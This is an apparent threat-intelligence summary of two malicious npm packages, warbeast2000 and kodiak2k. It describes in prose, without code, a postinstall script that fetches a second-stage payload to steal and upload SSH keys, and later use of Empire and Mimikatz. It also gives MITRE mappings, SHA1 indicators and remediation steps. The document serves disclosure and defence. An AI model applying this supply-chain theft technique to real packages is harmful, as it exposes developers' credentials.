Keypoints
- Two malicious npm packages—warbeast2000 and kodiak2k—were discovered and removed from npm after ReversingLabs identified their behavior in January.
- Both packages run a postinstall script that downloads and executes a second-stage JavaScript payload from remote repositories.
- The second-stage scripts search the victim’s <homedir>/.ssh directory for keys (default id_rsa or a file named meow), Base64-encode the key, and upload it to attacker-controlled GitHub repositories.
- Later kodiak2k versions also executed an archived Empire framework script and invoked Mimikatz to dump credentials from memory, indicating expanded malicious capabilities.
- ReversingLabs published SHA1 hashes for many package versions and two second-stage payloads as IOCs; both packages had limited download counts (~400 and ~950 respectively) before removal.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The packages use npm postinstall scripts to run JavaScript: ‘it would launch a postinstall script that fetched and executed a javascript file.’
- [T1105] Ingress Tool Transfer – The postinstall and follow-on scripts download additional JavaScript payloads: ‘That script downloads another javascript file and executes it.’
- [T1083] File and Directory Discovery – The second-stage scripts enumerate/read the SSH directory: ‘that script reads the contents of <homedir>/.ssh directory.’
- [T1005] Data from Local System – The malware reads private SSH keys from local files: ‘read the private ssh key stored in the id_rsa file located in the <homedir>/.ssh directory.’
- [T1041] Exfiltration Over C2 Channel (or cloud storage) – The stolen keys are uploaded externally to GitHub: ‘It then uploaded the Base64 encoded key to an attacker-controlled GitHub repository.’
- [T1003] OS Credential Dumping – kodiak2k invokes Mimikatz to extract credentials from memory: ‘the script also invokes the Mimikatz hacking tool, which is commonly used to dump credentials from process memory.’
Indicators of Compromise
- [Package name] malicious npm packages – warbeast2000, kodiak2k
- [SHA1 package hashes] npm package file integrity – example: warbeast2000 1.0.8: 2da32a4c9e2c3f345f46c6e06d6eb41e13da13d9; kodiak2k 1.0.42: 909927bd61f3466d777bbbff38fd844ed8f5c134 (and many more listed in the report).
- [Second-stage payload SHA1s] downloaded JS payloads – dba623bdad6bdb37359e047efcda34de4af5f518, 9526b820a21fa70641361e061b0f99517ab1b184
- [Filenames accessed] targeted key files – id_rsa (default SSH private key), meow (placeholder key filename observed)
Both npm packages implement a simple but effective multi-stage procedure: upon installation they execute an npm postinstall script that fetches a remote JavaScript second-stage and runs it in the victim environment. The second-stage script enumerates the user’s SSH folder, reads specific files (notably the default private key id_rsa or a file named meow), Base64-encodes the key material, and uploads the encoded data to attacker-controlled GitHub repositories.
In kodiak2k’s later versions the actor expanded capabilities by fetching an archived Empire post-exploitation script and invoking Mimikatz to dump credentials from process memory; other observed functions included launching local executables (e.g., notepad.exe, shutdown.exe) and a locally deployed binary named cryptor.exe, suggesting active testing of additional payloads. ReversingLabs published numerous SHA1 hashes for affected package versions and the two second-stage payloads to aid detection and response.
Detection and remediation: remove the listed package versions, verify and rotate any exposed SSH keys (id_rsa or similarly named keys), investigate unusual pushes or uploads to GitHub repositories, and use the provided SHA1 indicators to hunt for known payloads on developer systems.
Read more: https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data